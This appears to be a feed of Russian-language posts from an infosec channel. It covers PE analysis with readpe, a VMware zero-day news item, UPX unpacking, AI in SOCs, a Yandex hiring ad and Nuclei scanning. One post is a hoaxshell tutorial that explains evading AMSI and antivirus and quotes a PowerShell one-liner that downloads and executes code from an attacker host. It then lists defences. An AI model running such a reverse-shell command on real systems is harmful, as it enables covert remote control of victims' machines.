- Инструмент выводит информацию в отформатированном виде, что значительно ускоряет ее восприятие и анализ по сравнению.
- Readpe может дизассемблировать секции кода, преобразуя машинные инструкции в читаемый ассемблерный код.

▶️Устанавливаем

git clone https://github.com/mentebinaria/readpe.git
cd readpe
sudo make install
echo "/usr/local/lib" | sudo tee /etc/ld.so.conf.d/libpe.conf
sudo ldconfig

▶️Проверяем

readpe --h

▶️Общая информация о файле
Ключ -H выводит сводную информацию из заголовков

readpe -H notepad.exe

Вывод покажет архитектуру (

x86/x64

), точку входа, характеристики файла, размеры секций и другую метаинформацию.

▶️ Анализ таблицы импорта
Одна из самых востребованных функций. Какие внешние библиотеки и функции использует программа?

readpe -i notepad.exe

Вы увидите список всех импортированных

DLL

(например,

KERNEL32.DLL, USER32.DLL, GDI32.DLL

) и конкретных функций из них (

CreateFile, MessageBox, GetSystemTime и т.д.

). Это мгновенно дает понимание о потенциальных возможностях анализируемого файла.

▶️Просмотр секций
Ключ -S отображает все секции файла (.text, .data, .rdata, .rsrc и др.).

readpe -S notepad.exe

В выводе вы найдете имена секций, их виртуальные и физические размеры, атрибуты доступа. Это важно для оценки, например, наличия нестандартных или исполняемых секций с атрибутом на запись — частый признак уязвимости или зловредной техники.

Читать полностью…

🚩 Новые задания на платформе HackerLab!

🔎 Категория OSINT — Канатная дорога

🌍 Категория Веб — Nova Arts

Приятного хакинга!

Читать полностью…

Гайд по восстановлению данных: метаданные, карвинг и работа с образами.

🪵Удалили файл и тут же об этом пожалели? Не всё потеряно. В нашей новой статье разбираем, что на самом деле происходит с данными после удаления и как их можно вернуть.

Рассказываем простыми словами о сложных вещах:
🔵Как правильно создать образ сбойного диска утилитой ddrescue
🔵Как попытаться восстановить файлы с именами и папками
🔵Что такое файловый карвинг и когда он — последняя надежда
🔵Почему для SSD и флешек эти инструкции могут не сработать.

📎Лучший способ не потерять данные — быть готовым к их восстановлению. Сохраняйте подробный гайд и действуйте на опережение!

Читать полностью…

🇨🇳 Китайские хакеры используют Zero-day в VMware!

📞 Связанные с Китаем хакеры используют новую уязвимость нулевого дня VMware с октября 2024 года. По данным NVISO Labs , недавно исправленная уязвимость безопасности, затрагивающая Broadcom VMware Tools и VMware Aria Operations, эксплуатировалась как уязвимость нулевого дня с середины октября 2024 года злоумышленником под именем UNC5174.

❗️ Злоумышленники используют уязвимость CVE-2025-41244 с оценкой CVSS: 7,8, эксплуатируя локальную ошибку повышения привилегий в функции get_version(). Затрагиваются такие продукты, как VMware Cloud Foundation, VMware vSphere Foundation, VMware Aria Operations, VMware Telco Cloud Platform и VMware Telco Cloud Infrastructure.

🔎 Исследователь NVISO Максим Тибо обнаружил уязвимость и сообщил о ней 19 мая 2025 года. Компания также заявила, что VMware Tools 12.4.9, входящий в состав VMware Tools 12.5.4, устраняет эту проблему в 32-разрядных системах Windows, а версия open-vm-tools, устраняющая CVE-2025-41244, будет распространяться поставщиками Linux.

💻 По данным NVISO, уязвимость коренится в функции под названием «get_version()», которая принимает шаблон регулярного выражения (regex) в качестве входных данных для каждого процесса с прослушивающим сокетом, проверяет, соответствует ли двоичный файл, связанный с этим процессом, шаблону, и, если соответствует, вызывает команду версии поддерживаемой службы.

💻 Как утверждает эксперт, широкая практика имитации системных двоичных файлов (например, httpd) подчеркивает реальную возможность того, что несколько других видов вредоносного ПО в течение многих лет случайно извлекали выгоду из непреднамеренного повышения привилегий

❗️ Так что, если используете в своих инфраструктурах продукты VMware, то будьте внимательны!

Читать полностью…

Обход защиты с помощью hoaxshell: HTTP-канал для скрытного управления Windows

Специалисты по кибербезопасности традиционно разделяют инструменты для тестирования на проникновение на два типа: мощные, но сложные, или простые, но ограниченные. Hoaxshell — инструмент, который ломает стереотип. Скрипт использует нестандартный подход к работе с PowerShell, превращая его в эффективное средство для моделирования угроз и оценки защищённости инфраструктуры.

📌 Уникальность Hoaxshell
Традиционные методы получения обратного соединения (reverse shell) через PowerShell часто сталкиваются с проблемами: встроенные защитные механизмы Windows (AMSI), системы обнаружения вторжений (IDS) и межсетевые экраны легко распознают и блокируют стандартные шаблоны трафика.
Hoaxshell обходит эти препятствия за счет двух ключевых особенностей:
- В отличие от сырых TCP-сокетов, hoaxshell использует HTTP/S-запросы для коммуникации. Это позволяет ему маскировать свой трафик под легитимную активность веб-браузера или другого приложения, что значительно усложняет его обнаружение.
- Инструмент генерирует команды PowerShell, которые не содержат явных признаков вредоносной активности. Эти команды динамически получают инструкции от сервера, что позволяет обходить статические сигнатуры антивирусов.

⬇️Установка

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

⬇️Проверка

hoaxshell -h

⚪Запуск сервера
Серверная часть hoaxshell запускается на машине тестировщика (атакующего). Самый простой способ — запустить его на всех интерфейсах, указав порт.

sudo python3 hoaxshell.py -s 8080

После запуска скрипт сгенерирует уникальную команду PowerShell, которую необходимо выполнить на целевой машине. Это будет выглядеть примерно так:

PS C:\> $s='http://ВАШ_IP:8080'; $i='UNIQUE_SESSION_ID'; $p='http://proxy-server.com:8080'; iex (New-Object Net.WebClient).DownloadString("$s/index.html")

⚪Вариации для обхода защиты
Для шифрования трафика и лучшей маскировки можно использовать встроенный сервер с SSL.

sudo python3 hoaxshell.py -s 443 -t ssl

В этом случае команда для цели будет использовать

https://

. Если целевая машина использует корпоративный прокси, в команду можно добавить соответствующие параметры.

📌 Меры защиты от инструментов типа hoaxshell
- Мониторинг сетевой активности (выявление регулярных HTTP/S-сессий между внутренними хостами и внешними IP)
- Аудит журналов PowerShell
(контроль событий выполнения внешнего кода (например, через DownloadString))
- Ограничение возможностей PowerShell (использование Constrained Language Mode для блокировки выполнения скриптов)
- Сегментация сети (блокировка несанкционированных исходящих HTTP/S-подключений с рабочих станций)

Читать полностью…

🛠 Мощь и беспомощность пакера UPX

В новой статье мы подробно разбираем UPX - один из самых популярных упаковщиков исполняемых файлов. Это подробный гайд для тех, кто хочет понять, как работает UPX, и научиться распаковывать файлы вручную.

Внутри вас ждет:
🔵Принцип работы UPX. Как упаковщик перестраивает PE-файл и какие изменения вносит в его структуру.
🔵UPX-заголовок. Объяснение структуры заголовка и почему его повреждение делает автоматическую распаковку невозможной.
🔵Ручная распаковка. Пошаговая инструкция по восстановлению Original Entry-Point (OEP) и Import Address Table (IAT) для корректного запуска файла.

📌 Читать статью

#upx #reverse #infosec

Читать полностью…

🤖 ИИ внедряется в работу SOC

📊 Исходя из недавнего исследования Prophet Security, традиционная модель работы SOC уже не выдерживает наплыва работы, накапливая большие объемы оповещения, замедляя расследования и увеличивая стоимость перегруженных команд SOC-аналитиков.

🗣 Опрос проходил среди 282 руководителей служб безопасности компаний из разных отраслей, раскрывая суровую реальность, с которой сталкиваются современные центры безопасности, которые уже не могут скрывать такие серьезные проблемы, как пропуск критических угроз.

📈 В связи с чем компании стали активно внедрять ИИ в работу своих SOC команд. Таким образом ИИ переходит от эксперимента к стратегическому приоритету.

🤖 В настоящее время 55% служб безопасности уже используют ИИ, как ассистента в рабочих процессах для поддержки сортировки оповещений и проведения расследований.

📈 Следующая волна внедрения стремительно приближается. Среди команд, ещё не использующих ИИ, 60% планируют оценить решения SOC на базе ИИ в течение года. Согласно опросу, ожидается, что в ближайшие три года 60% всех рабочих нагрузок SOC будут обрабатываться с помощью ИИ.

⌛️ В качестве метрик успешности внедрения ИИ организации планируют оценивать прогресс по сокращению среднего времени расследования (MTTI) и среднего времени реагирования (MTTR), а также по традиционным показателям закрытия оповещений.

Читать полностью…

Устроиться специалистом по информационной безопасности в Яндекс за несколько дней

Для этого есть отличная возможность: мы приглашаем специалистов с опытом от 2 лет на Week Offer Security 11–17 октября. Всего за неделю вы сможете пройти все собеседования и получить офер в Яндекс.

Как это устроено:

🔸 Регистрируйтесь и отправляйте заявку до 8 октября
🔸 Пройдите две технические секции 11–12 октября
🔸 Познакомьтесь с командами и получите офер 13–17 октября

Для регистрации переходите по ссылке. Удачи!

Читать полностью…

Nuclei: Автоматизация безопасности через шаблоны

Nuclei — инструмент командной строки с открытым исходным кодом для масштабируемого сканирования безопасности на основе шаблонов. Принцип работы основан на использовании централизованной базы шаблонов (формат YAML). Каждый шаблон содержит инструкции для проверки одной конкретной уязвимости, небезопасной конфигурации или технологии.

✅Преимущества
- Шаблоны позволяют минимизировать ложные срабатывания за счет точного описания условий обнаружения
- Сообщество безопасности регулярно создает и обновляет шаблоны для новых уязвимостей
- Поддерживает проверки HTTP, DNS, TCP и рабочих процессов

✨Устанавливаем

go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
nuclei -update-templates

✨Проверяем

nuclei -h

✨Сканируем

nuclei -u example.com -severity critical,high
nuclei -list targets.txt -o results.json -json

🟣Для проверки цели на конкретную уязвимость (например, Log4Shell (CVE-2021-44228)), укажем путь к конкретному шаблону:

nuclei -u https://example.com -t /path/to/nuclei-templates/cves/2021/CVE-2021-44228.yaml

Получаем такой результат:

[CVE-2021-44228] @ https://example.com/api/login
[info] The target is vulnerable to Log4Shell (CVE-2021-44228).
[template] cves/2021/CVE-2021-44228.yaml
[severity] critical

📎Полезные команды
✨Объединение с subfinder и httpx

echo "domain.com" | subfinder | httpx | nuclei -silent

✨Оптимизация скорости

nuclei -list targets.txt -rate-limit 50 -concurrency 10

✨Лимиты для избежания блокировок

nuclei -u example.com -rate-limit 10 -timeout 20

❎Недостатки
- Высокая нагрузка на сеть при агрессивном сканировании
- Риск блокировки IPS/WAF системами при отсутствии настройки лимитов

Читать полностью…